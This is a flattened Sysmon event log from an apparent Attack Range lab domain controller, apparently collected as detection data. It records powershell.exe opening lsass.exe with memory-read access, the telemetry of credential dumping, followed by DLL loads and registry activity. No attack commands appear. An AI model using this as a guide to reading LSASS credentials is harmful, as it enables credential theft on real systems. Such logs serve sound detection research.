12:18:44.507{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057347800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057347798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057347797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057347796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=D17E11DDF716089AF736DBA7C4F24C75,SHA256=DF301F2F2A735A1A75EAE79E64CCFDAD335E319B98316E9E875F726FA2CB51D5trueMicrosoft CorporationValid 734700x800000000000000057347795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\c4a9ae053d0ac0645c08ae81f083121d\System.Transactions.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=992BDD0BA5CA1305C35337080E779862,SHA256=37D038879A46694553D2D62090B2C34B5C4A6310B753DBE8E5AC80AE90700D21false-Unavailable 734700x800000000000000057347794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.507{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\44471e4b0e7b143ba574354f8937ee2c\Microsoft.PowerShell.Security.ni.dll10.0.14393.2848Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Security.dllMD5=EC09E92E968F15B182014DFF6452C459,SHA256=7A6F5511CA622E29367F6ED25A0E924C4BD1DD8D8CAC594119F1555B208C43DDfalse-Unavailable 734700x800000000000000057347793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.491{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 11241100x800000000000000057347792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.491{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057347791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.491{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA3AE9652C4DAB30152101C4B707726,SHA256=CDAE9C61AACADF875BA5BFB41B32D6F63767634E1D0BBFCF592B6E3952D4E28Dfalsetrue 11241100x800000000000000057347790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.491{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057347789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.491{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=86CCF2CA2B5C64E20DCC69759E99F95B,SHA256=776283472D78ACDD4FEC1759AC3E4E4869E0AA51867E9BAC7C4E4C32EBC8B381falsetrue 17141700x800000000000000057347788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:44.491{8B6011A9-5BA4-618E-52F3-04000000F101}2156\PSHost.132811931243488224.2156.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000057347787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.460{8B6011A9-5BA4-618E-52F3-04000000F101}2156ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wvzmt4gd.c4p.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsetrue 23542300x800000000000000057347786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.460{8B6011A9-5BA4-618E-52F3-04000000F101}2156ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_poliyh52.fak.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsetrue 734700x800000000000000057347785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.460{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 734700x800000000000000057347784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.460{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 12241200x800000000000000057347783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.444{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.441{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057347759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.441{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 12241200x800000000000000057347758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.441{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.441{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 734700x800000000000000057347756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.441{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057347755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.440{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 734700x800000000000000057347754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.439{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 734700x800000000000000057347753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057347752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 13241300x800000000000000057347751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057347746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 734700x800000000000000057347745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 734700x800000000000000057347744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\0fa7d4546f2b433a475b782745fe3354\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5880059EC43D513D3D2B58BB915ADE73,SHA256=338F7838E9D1CD563FD832A382B9CCB1591D59A7280FC7001D29D912909CBBBEfalse-Unavailable 734700x800000000000000057347743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4530 (rs1_release.210705-0736)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=A579FD92E60D1CE05E20BF7569D579E8,SHA256=CD9DF3851153E3770E343CE224E6F969B9C5A466BF8C1036242DCBB5CE0F7986trueMicrosoft WindowsValid 734700x800000000000000057347742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.4467 (rs1_release.210604-1844)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=96BBBC9AD606CF5EBAF525E3AB1C69A5,SHA256=32F0EA9185A6E1DE26E3276BAAB0FB5ED72940D34FE5FFDF5331D91E42794124trueMicrosoft WindowsValid 12241200x800000000000000057347741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software 